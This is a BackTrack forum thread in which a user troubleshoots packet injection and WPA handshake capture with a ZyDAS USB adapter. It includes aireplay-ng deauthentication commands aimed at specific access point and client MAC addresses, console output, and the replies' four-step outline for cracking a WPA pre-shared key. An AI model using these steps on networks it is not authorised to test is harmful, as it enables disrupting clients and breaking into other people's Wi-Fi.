why not ugrade to bt4 have you try'd to inject on bt4 easy way to see is boot up and login, open term type airmon-ng start eth1 and then aireplay-ng --test your monitor interface (--test) basicly test's injection
I am using BT3 with linux kernel 2.6.21.5
Should I upgrade the kernel or not?
There are only zd1211rw_inject_2.6.26.patch and zd1211rw_inject_2.6.23.patch
What should I do next?
why not ugrade to bt4 have you try'd to inject on bt4 easy way to see is boot up and login, open term type airmon-ng start eth1 and then aireplay-ng --test your monitor interface (--test) basicly test's injection
The interface changes to mon0 when it enters the monitor modeCode:aireplay-ng --test mon0 For information, no action required: Using gettimeofday() instead of /dev/rtc 03:24:02 Trying broadcast probe requests... 03:24:04 No Answer... 03:24:04 Found 0 APs
I am running both BT3 and BT4 beta using VMWare. Is there any impact on this?Code:airmon-ng start wlan0 (Not eth1 anymore in BT4...) Found 1 processes that could cause trouble. If airodumo-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! -e PID Name 5330 Knetworkmanager Interface Chipset Driver wlan0 ZyDAS 1211 zd1211rw - [phy0] (monitor mode enabled on mon0)
Even I test the injection both in BT3 and BT4 beta... None of them work... T.T
Is there something wrong with my wireless USB adaptor...?
Even I test the injection both in BT3 and BT4 beta... None of them work... T.T
Is there something wrong with my wireless USB adaptor...?
1st please do not double post/Originally Posted by charlescywong
To be successful here you should read all of the following.
ForumRules
ForumFAQ
If you are new to Back|Track
Back|Track Wiki
Failure to do so will probably get your threads deleted or worse.
I have read the following post that indicate the Hawking HWU8DD rev. B can inject... But I still have problem on injecting...even the inject test is fail...
hxxp://forums.remote-exploit.org/showthread.php?t=18309&highlight=injection+HWU8DD
Do I need to make a fake authentication to the AP first before I de-authenticate the client ot vice versa?
and
Do I need to associate with the AP before I do any injection?
The problem is obviously with your comprehension.
Since the title of this thread is in regards to wpa here are the basic stepsDo I need to make a fake authentication to the AP first before I de-authenticate the client ot vice versa?
and
Do I need to associate with the AP before I do any injection?
Start the wireless interface in monitor mode on the specific AP channel
Start airodump-ng on AP channel with filter for bssid to collect authentication handshake.
Use aireplay-ng to deauthenticate the wireless client
Run aircrack-ng to crack the pre-shared key using the authentication handshake
Since you are having trouble with the capture itself why not have a look at
this tutorial and follow it through.
To be successful here you should read all of the following.
ForumRules
ForumFAQ
If you are new to Back|Track
Back|Track Wiki
Failure to do so will probably get your threads deleted or worse.
I have actually read through the tutorial from aircrack-ng website:
"Tutorial: How to Crack WPA/WPA2" hxxp://www.aircrack-ng.org/doku.php?id=cracking_wpa
And I follow it step by step...
Just when I was doing "Step 3 - Use aireplay-ng to deauthenticate the wireless client", I cannot capture any handshakes, No matter how many time I try to send deauth message to the AP and client...
can we have your commands and actual output?
Please copy them directly from the console.
thanks
I can't capture any handshake...>.< Why?Code:bt ~ # airmon-ng stop eth1 Interface Chipset Driver eth1 ZyDAS 1211 zd1211rw (monitor mode disabled) bt ~ # airmon-ng start eth1 4 Found 1 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! PID Name 3520 dhcpcd Interface Chipset Driver eth1 ZyDAS 1211 zd1211rw (monitor mode enabled) bt ~ # iwconfig lo no wireless extensions. eth0 no wireless extensions. eth1 IEEE 802.11b/g ESSID:off/any Nickname:"zd1211" Mode:Monitor Frequency:2.472 GHz Access Point: Invalid Bit Rate=1 Mb/s Encryption key:off Link Quality:0 Signal level:0 Noise level:0 Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 bt ~ # airodump-ng -c 4 --bssid 00:11:6B:18:EB:F6 -w wpa20090315 eth1 (Than it starts capturing packet.....) bt ~ # aireplay-ng -0 10 -a 00:11:6B:18:EB:F6 -c 00:16:EA:C8:27:30 eth1 06:08:58 Waiting for beacon frame (BSSID: 00:11:6B:18:EB:F6) on channel 13 06:08:58 eth1 is on channel 13, but the AP uses channel 4 bt ~ # aireplay-ng -0 10 -a 00:11:6B:18:EB:F6 -c 00:16:EA:C8:27:30 eth1 06:09:02 Waiting for beacon frame (BSSID: 00:11:6B:18:EB:F6) on channel 4 06:09:03 Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 1| 0 ACKs] 06:09:04 Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 0| 0 ACKs] 06:09:05 Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 0| 0 ACKs] 06:09:06 Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 6| 2 ACKs] 06:09:07 Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 0| 0 ACKs] 06:09:08 Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 1| 0 ACKs] 06:09:09 Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 1| 0 ACKs] 06:09:11 Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 1| 0 ACKs] 06:09:11 Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 0| 0 ACKs] 06:09:12 Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 1| 0 ACKs] bt ~ #
Give the full output of:
airodump-ng -c 4 --bssid 00:11:6B:18:EB:F6 -w wpa20090315 eth1
(Than it starts capturing packet.....)
I can clearly see that your deauth is not working
Posting Permissions